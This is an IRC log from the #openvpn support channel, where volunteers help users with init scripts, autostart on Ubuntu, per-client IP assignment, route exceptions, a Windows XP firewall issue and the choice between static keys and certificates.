00:13 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN
00:13 <+pekster> You just symlink openvpn.name -> openvpn and the initscript figures out what config you want from the .name portion
00:14 <+pekster> ngharo: Check out Gentoo's initscripts if you want some ideas on how to extend that to your OS. I did something similar for the OpenWRT platform based on symlinks and bash scripting
00:14 < ngharo> will do
00:14 <+pekster> It's actually really simple once you understand how it works
00:14 < osirisx11> krzee: thanks i like your idea i would love for it to stalk my connection and autoconnect anytime i go online anywhere, how can i do this?
(ubuntu)
00:14 <@krzee> depending on your needs you could do anything from use the built in os commands for starting / stopping daemons, to building your own command center in your fav language that interacts with management interface
00:14 <+pekster> I have no clue why this isn't the default way to do things on other distros
00:15 < ngharo> pekster: can you give me an example on usage? do you `/etc/init.d/openvpn start foobar'
00:15 <+pekster> ngharo: /etc/init.d/openvpn.config1 start
00:15 <@krzee> osirisx11, its more or less normal, just make sure your configs are set with a keepalive, retry forever, maybe some persist options
00:15 <@krzee> !confgen
00:15 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash
00:15 < ngharo> ohh, pekster gotcha.
00:15 <+pekster> /etc/init.d/openvpn.config1 is just a symlink to /etc/init.d/openvpn
00:15 <@krzee> osirisx11, the configs from that should be fine ^
00:15 <@krzee> osirisx11, or !sample
00:15 < ngharo> ringing some bells back from my gentoo days. net.eth0, net.eth1... etc scripts
00:15 <+pekster> ngharo: Obviously the bash in the initscript is smart enough to parse out the "config1" part of that (ie: everything after the "openvpn." part) and treat it as a config file
00:15 < ngharo> pekster: thanks
00:16 <+pekster> If you're a competent scripter, it should be trivial to design that same thing for your platform. If you need some hints, just go to gentoo's svn sources and see what they've done
00:16 <@krzee> pekster, that is similar to the freebsd way, you cp the script with .name and then configure it in rc.conf
00:17 <+pekster> IIRC, something like ${0#*.} is a good place to start tinkering
00:17 <+pekster> krzee: Yes, netbsd/fbsd does things similar to gentoo.
This is why I prefer gentoo over most other lsb/sysV-based crap distros ;)
00:17 <+pekster> It's much more "sane" :P
00:17 <@krzee> ++
00:17 <+pekster> Although, they lack support to interact with just one instance/pid
00:18 <@krzee> who does?
00:18 < osirisx11> krzee: sorry what is !sample?
00:18 <+pekster> NetBSD does, at least. You can set the configs you want to start in rc.conf, but you *can't* tell the initscript to stop or HUP one, for instance
00:18 <+pekster> That's a PITA when you need to restart just a single instance, or stop it then start it later after you do something else
00:19 <@krzee> /usr/local/etc/rc.d/openvpn.name {start,stop,restart,etc}
00:19 <+pekster> Hmm, that wasn't how netbsd did it, at least in the version we used at the time last job
00:19 <@krzee> osirisx11,
00:19 <@krzee> !sample
00:19 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
00:20 * krzee pets vpnHelper
00:20 <+pekster> NetBSD just used the '$openvpn' (or something like that) variable from rc.conf to pass to a loop and blindly started them all
00:20 < osirisx11> what do i do with that config?
00:20 <+pekster> If one died, or you wanted to stop just one, you had to hunt the pidfile down and interact with it yourself :(
00:20 < osirisx11> i already have a working openvpn config
00:20 <@krzee> havnt used netbsd
00:21 <@krzee> osirisx11, how are you starting openvpn now?
00:21 < osirisx11> nm-applet
00:21 <@krzee> oh i see
00:21 <@krzee> !ubuntu
00:21 <@vpnHelper> "ubuntu" is dont use network manager!
00:21 <@krzee> !netman
00:21 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont!
http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list
00:21 <@krzee> =]
00:22 <@krzee> put your working config in /etc/openvpn
00:22 <@krzee> with .conf as the file extension
00:22 <@krzee> (ubuntu's openvpn init script starts all openvpn instances)
00:22 < osirisx11> i have an ovpn
00:22 < osirisx11> and keys
00:22 <@krzee> rename ovpn to conf
00:22 < osirisx11> ovpn file extension file i mean
00:23 < osirisx11> yea? why the diff file extension in the first place?
00:23 < osirisx11> are they 1:1?
00:23 <@krzee> openvpn doesnt care, only the init script does
00:23 <@krzee> windows likes .ovpn
00:23 < osirisx11> lol windows
00:23 <@krzee> in reality, its just a text file either way
00:23 < osirisx11> sure
00:23 <+pekster> ngharo: Here's a quick-start guide to hacking your own (superior) init script: use the output of ${0#*.} to strip out the leading "*." of the called command. eg: /etc/init.d/openvpn.sample would set that bash sequence I used earlier to "sample"
00:23 < osirisx11> ok so i rename it then i put it in.. /etc/openvpn
00:23 < osirisx11> then what?
00:24 < osirisx11> thx krzee
00:24 <@krzee> tell your OS to run openvpn on boot
00:24 <@krzee> i dont run ubuntu
00:24 <+pekster> man upstart, perhaps?
00:24 -!- EugeneKay [eugene@itvends.com] has quit [Quit: ZNC - http://znc.in]
00:25 <@krzee> update-rc.d openvpn enable 2345
00:25 -!- EugeneKay [eugene@selfloath.in] has joined #openvpn
00:25 <@krzee> http://ubuntuforums.org/showthread.php?t=1609579
00:25 <@vpnHelper> Title: [ubuntu] How to autostart Openvpn server at boot ? - Ubuntu Forums (at ubuntuforums.org)
00:25 <+pekster> Every time I have to do something under Ubuntu that's trivial in Gentoo, I end up ripping my hair out ;)
00:33 < osirisx11> thanks krzee
00:34 <@krzee> np
00:34 < osirisx11> krzee: will this update nm-applet to show vpn encrypted icon?
00:35 <@krzee> doubt it
00:35 <@krzee> !netman
00:35 <@krzee> :-p
00:35 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list
00:35 < osirisx11> he just said it sucked. this is not constructive
00:35 < osirisx11> what do you use to see current network status?
00:35 < osirisx11> is there a better gnome panel?
00:36 <@krzee> use netman for that, but not for your vpn
00:36 <@krzee> let openvpn run as a service
00:42 < osirisx11> ok
00:42 < osirisx11> can i have the conf be a symlink?
00:42 < osirisx11> to a portable drive
00:43 < osirisx11> i want to boot, mount drive, wait for internet and connect ovpn,
00:51 -!- osirisx11 [~osiris@93.114.44.253] has quit [Quit: Leaving.]
00:57 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has joined #openvpn
01:13 -!- vilce [~vilce@vpn.classit.ro] has joined #openvpn
01:13 < vilce> !welcome
01:13 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
01:13 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
01:16 < vilce> Hi guys, can I setup simultaneous connections from the same user/pass (and give different IP addresses for each connection) ?
01:17 <+pekster> vilce: Sure, see the --duplicate-cn config option
01:18 < vilce> pekster: thank you mate. and is there also the option to specify a range like /29 too ?
01:18 <+pekster> A range for what?
01:19 < vilce> let's see I want to allow 5 IP for 5 simultaneous connections for the same user "vilce"
01:19 <+pekster> If you want to cap arbitrarily like that you'd need to write your own backend logic to do that and use a --client-connect script
01:20 <+pekster> ie: manage the pool of IPs yourself and script the assignment to connecting peers
01:20 < vilce> but it's possible what I want right ?
01:21 <+pekster> Indeed, with some scripting you can get exactly what you want
01:22 < vilce> yep, nice, I want something like home-pc/work-pc/children-pc/wife-pc/laptop to use the same user/pass to see in the "lan"
01:23 < vilce> I will keep reading about this, thanks
01:27 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.]
01:34 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection]
01:54 -!- brute11k [~brute11k@89.249.230.238] has joined #openvpn
01:54 -!- bisko [~bisko@77.70.26.115] has joined #openvpn
02:09 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn
02:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 255 seconds]
02:19 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
02:22 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has quit [Ping timeout: 252 seconds]
02:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:30 -!- vilce [~vilce@vpn.classit.ro] has quit []
02:31 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn
02:37 -!- EugeneKay [eugene@selfloath.in] has quit [Quit: ZNC - http://znc.in]
02:51 -!- EugeneKay [EugeneKay@selfloath.in] has joined #openvpn
02:58 -!- denon [~denon@unaffiliated/denon] has quit [Ping timeout: 245 seconds]
03:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
03:11 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
03:17 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:36 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
03:53 -!- novaflash is now known as novaflash_away
04:10 < AsadH> get your butt back here novaflash_away !
04:22 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out]
04:24 -!- Saviq [~Saviq@sawicz.net] has quit [Changing host]
04:24 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn
05:01 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
05:03 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
05:16 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
05:16 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn
05:18 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn
05:21 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
05:23 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn
05:28 -!- novaflash_away is now known as novaflash
05:29 <@novaflash> yeah yeah yeah take it easy asadh
05:29 <@novaflash> i had to defeat the Ogre of Windows Update first
05:31 <+pekster> Don't feel too bad novaflash; I just had an awful time reading about this: http://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames
05:31 <@vpnHelper> Title: freedesktop.org - Software/systemd/PredictableNetworkInterfaceNames (at www.freedesktop.org)
05:31 <+pekster> Check out what my "new" network name would be for eth0 on this system: http://fpaste.org/Qa3N/
05:32 <@novaflash> oh
05:32 <@novaflash> yeah
05:32 <@novaflash> predictable
05:32 <+pekster> "predictable"
05:32 <@novaflash> i wish they'd just leave it eth0!
05:32 <+pekster> My USB-adapters would be named based on where they are connected in the USB bus/hub chain :(
05:32 <@novaflash> in 90% of the cases that's the default interface name anyways
05:32 <@novaflash> haha that's going to be fun
05:33 <+pekster> So if I plug my adapter in on the opposite side of my netbook, it gets a new iface name :(
05:33 <@novaflash> so something like usb0002enp0s18 ?
05:33 < AsadH> woo! :)
05:33 < AsadH> are you still running windows update novaflash..?
05:33 < AsadH> it's been five days
05:33 <@novaflash> nah i'm done with it
05:33 <@novaflash> yup
05:33 <+pekster> novaflash: Yea, you get samples here: http://cgit.freedesktop.org/systemd/systemd/tree/src/udev/udev-builtin-net_id.c#n20
05:33 <@vpnHelper> Title: systemd/systemd - System and Session Manager (at cgit.freedesktop.org)
05:33 <@novaflash> hahaha
05:33 <+pekster> novaflash: Check out the satanic device name on line 76 on that file
05:33 <@novaflash> wwp0s29u1u4i6
05:33 <@novaflash> lol i just found it
05:33 <+pekster> Yea
05:33 <+pekster> lmao
05:34 <@novaflash> fun times
05:34 <@novaflash> nah i just had a little problem with one particular windows update that wouldn't go because i had disabled the windows firewall services
05:34 <@novaflash> of course it doesn't tell you this
05:34 <@novaflash> and just silently fails
05:40 <@novaflash> "hello i want magical solution that checks every client computer if their antivirus is up to date, without knowing what antivirus they are using, can access server do this?" ..
sigh
05:43 <+pekster> novaflash: Here's your canned reply to that: http://lh3.ggpht.com/-Uv31mkKU_jk/S99BW8bsF7I/AAAAAAAAA_k/W3I8mpu5LoQ/dsl-modem-condom.jpg
05:43 <@novaflash> :-D
05:49 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving]
05:50 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds]
05:51 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
05:55 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 248 seconds]
05:55 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn
06:01 < andi> Hi
06:02 < andi> I have an openvpn tunnel running. The client routes all the traffic through the tunnel. I'd like to add some private networks which should not be routed through the tunnel. Can somebody give me an example how to add the command "route add -net 192.168.0.0/24 gw 192.168.1.1" to openvpn client configuration?
06:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out]
06:13 -!- dazo_afk is now known as dazo
06:13 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
06:14 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:20 <@novaflash> are you sure you want to do this by pushing a route?
06:20 <@novaflash> and not just setting these routes up locally on the client side?
06:21 <+pekster> If this is an exception for client-side networks, it would make more sense to do it in the client's ovpn config, not the client terminal (obviously if this is consistent across all your clients, it should be pushed from the server)
06:22 <+pekster> andi: See the --route in the manpage, since you get a few variables to play with.
Specifically, I think you want to use the net_gateway variable
06:22 <+pekster> Short example in openvpn config syntax: 'route 192.168.0.0 255.255.255.0 net_gateway'
06:23 <+pekster> mod to taste, and/or wrap it in a server-side push statement
06:23 <+pekster> This said, you never need to redirect your client link-local LAN since you already have a higher priority route for it
06:24 <+pekster> (if that's what you're trying to do)
06:36 -!- joshie [~josh@joshie.net] has joined #openvpn
06:47 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
06:47 < Azrael_-> hi
06:48 <@novaflash> pekster, you have a brain! awesome.
06:48 < Azrael_-> i run winxp sp2 with openvpn. but after installing openvpn the windows firewall service doesn't start any more and without it all incoming connections are blocked. how can i resolve this?
06:49 <@novaflash> xp sp2? isn't it time you updated to sp3..?
06:50 <@novaflash> and did you install openvpn 2.3 or the older 2.2.2 ? might want to give the older one a try.
06:50 < Azrael_-> sorry, my bad. it is sp3
06:51 < Azrael_-> i installed the 2.2.2
06:51 < Azrael_-> and it seems like the windows firewall has problems with the network-adapter of openvpn
06:53 < kisom> Azrael_-: Without the firewall all connections are allowed by default.
06:53 < Azrael_-> kisom: but without the windows firewall service running i can't even ping the machine. after starting the service it works again just fine
06:54 < kisom> Azrael_-: Sounds weird, since it's the firewall's responsibility to block incoming connections
06:54 < kisom> Azrael_-: Check your firewall rules imo.
06:55 < Azrael_-> kisom: yeah, but in winxp the service is also name as "windows firewall/shared internet connection"-service. thus i think there are more features included beside the firewall-blocking
06:56 < Azrael_-> *named
06:56 <@novaflash> sounds a little strange to me too.
perhaps you can try starting the firewall service, then going into the windows security settings and disabling the firewall completely. perhaps then things will start functioning properly again.
06:58 <@novaflash> and ICS, internet connection sharing, is not necessary to just get a connection to the internet - but it is required if you want to share your internet connection to other machines on your network if you have a second network card and share the internet on that. i don't know why anyone would want to do this, since people usually just have a router and a switch to take care of business, but...
06:58 <@novaflash> ...it's possible, i suppose.
06:59 < Azrael_-> i know as i don't use this feature
06:59 < Azrael_-> just trying the disabling-scenario
07:05 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn
07:06 < sam1> !welcome
07:06 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki
07:06 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
07:07 < sam1> !mitm
07:07 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config
07:08 < sam1> !topology
07:08 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions.
or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
07:13 < sam1> !route
07:13 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
07:16 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has left #openvpn []
07:53 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Ping timeout: 252 seconds]
07:54 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn
07:54 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood]
08:14 -!- erry [erry@freenode/staff/erry] has joined #openvpn
08:16 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn
08:21 -!- Saviq [~Saviq@canonical/saviq] has quit [Ping timeout: 248 seconds]
08:22 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn
08:25 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit []
08:26 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn
08:26 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood]
08:36 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds]
08:36 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Quit: leaving]
08:45 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
08:49 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
08:52 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn
08:56 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
09:22 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn
09:28 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
09:34 -!- AsadH is now known as zz_AsadH
09:47 -!- jthunder [~jthunder@184.151.222.180] has joined #openvpn
09:53 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Ping timeout: 245 seconds]
10:14 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
10:14 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
10:14 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
10:15 -!- zz_AsadH is now known as AsadH
10:18 -!- b1rkh0ff [~b1rkh0ff@31.176.186.83] has quit [Ping timeout: 240 seconds]
10:24 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza]
10:27 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has joined #openvpn
10:32 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:38 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer]
10:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
10:39 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
10:43 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
10:43 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
10:45 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
10:46 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 245 seconds]
10:51 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection]
10:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
10:54 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Ping timeout: 255 seconds]
11:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds]
11:01 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
11:06 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn
11:11 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:16 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:21 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Quit: ZNC - http://znc.in]
11:21 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....]
11:21 -!- bisko [~bisko@77.70.26.115] has quit [Ping timeout: 245 seconds]
11:22 -!- raidz [~raidz@raidz.im] has joined #openvpn
11:22 -!- raidz [~raidz@raidz.im] has quit [Changing host]
11:22 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
11:22 -!- mode/#openvpn [+o raidz] by ChanServ
11:30 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
11:31 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 245 seconds]
11:34 -!- b1rkh0ff [~b1rkh0ff@92.36.195.218] has joined #openvpn
11:54 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has joined #openvpn
11:57 -!- Valcorb|| [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
12:00 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 240 seconds]
12:02 -!- AsadH is now known as zz_AsadH
12:04 -!- b1rkh0ff [~b1rkh0ff@92.36.195.218] has quit [Ping timeout: 252 seconds]
12:05 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
12:05 -!- b1rkh0ff [~b1rkh0ff@31.176.168.75] has joined #openvpn
12:06 -!- Valcorb|| [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 256 seconds]
12:08 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds]
12:08 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn
12:11 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
12:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
12:32 -!- jthunder [~jthunder@184.151.222.180] has quit [Ping timeout: 260 seconds]
12:37 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
12:41 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 255 seconds]
12:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
13:04 -!- kusznir [~kusznir@76.178.145.28] has quit [Read error: Connection reset by peer]
13:05 -!- kusznir [~kusznir@76.178.145.28] has joined #openvpn
13:17 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer]
13:20 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn
13:25 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Ping timeout: 248 seconds]
13:36 -!- jthunder [~jthunder@70.28.245.77] has joined #openvpn
13:52 -!- zz_AsadH is now known as AsadH
14:07 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn
14:08 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
14:08 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn
14:34 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer]
14:34 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn
14:35 -!- kusznir [~kusznir@76.178.145.28] has quit [Read error: Connection reset by peer]
14:40 -!- brute11k [~brute11k@89.249.230.238] has quit [Quit: Leaving.]
14:44 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
14:48 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn
15:02 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn
15:16 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:19 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn
15:19 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Remote host closed the connection]
15:26 -!- bjh4 [~bjh4@12.239.198.1] has quit [Quit: Leaving]
15:55 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit []
15:55 < Azrael_-> hi
16:00 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
16:01 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Ping timeout: 260 seconds]
16:03 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.]
16:04 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:05 < Eagleman7> Any idea why openvpn on my router with redirect-gateway is way slower than a direct connection from my pc to the vpn server with redirect-gateway ?
16:05 < Eagleman7> 12mbit vs 55 mbit difference, exact same config files
16:08 < rob0> maybe the router is CPU- and memory-constrained and cannot keep up with the encryption task.
16:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
16:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Connection reset by peer]
16:12 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Connection reset by peer]
16:13 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
16:16 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:16 < Eagleman> Looks like the cpu is too slow on the router
16:20 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
16:21 -!- dazo is now known as dazo_afk
16:25 < Azrael_-> had some trouble setting up openvpn on winxp sp3. failed miserably with 2.2. reinstalled the whole windows and tried now 2.3 and everything worked just fine
16:26 < Azrael_-> (one advantage perhaps: i didn't try hamachi first)
16:35 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
16:38 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit [Ping timeout: 255 seconds]
16:39 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn
16:39 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 245 seconds]
16:46 -!- hurleyman [~hurleyman@mail.caffalltile.com] has joined #openvpn
16:47 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.]
16:47 < hurleyman> hello
16:49 < blackmagic> hello.
16:49 < hurleyman> I have a quick question. I have a small business server and I am reading up on VPN. At the most we will have maybe 1 or 2 users connected
16:50 < hurleyman> would you recommend a static key setup
16:50 <@krzee> no i would not
16:50 <@krzee> !statickey
16:50 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info
16:50 < blackmagic> for both users? no. i would create a server/client setup PER user.
16:50 <@krzee> per user?
16:50 <@krzee> 1 pki will handle all users
16:50 <@krzee> and other offices
16:50 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 245 seconds]
16:51 < blackmagic> heh i did one per user :x
16:52 < hurleyman> perfect. the more I was reading made sense to go server/client but I also didn't want to go overkill
16:52 <@krzee> static key has no forward security
16:52 < blackmagic> no such thing as overkill LOL.
16:52 <@krzee> for simply that reason I'd use server/client whenever possible
16:53 <@krzee> and if you have 2 clients, that's another reason to use server/client
16:53 <@krzee> bbl, break is over =]
16:53 < blackmagic> heh
16:53 -!- AsadH is now known as zz_AsadH
16:53 < hurleyman> and makes sense for growth. it would suck if I had to change it all in a few months cause more users are wanting VPN
16:53 < blackmagic> working on his break :D
16:53 < blackmagic> hurleyman, create yourself a vpnusersetup.sh if that be the case.
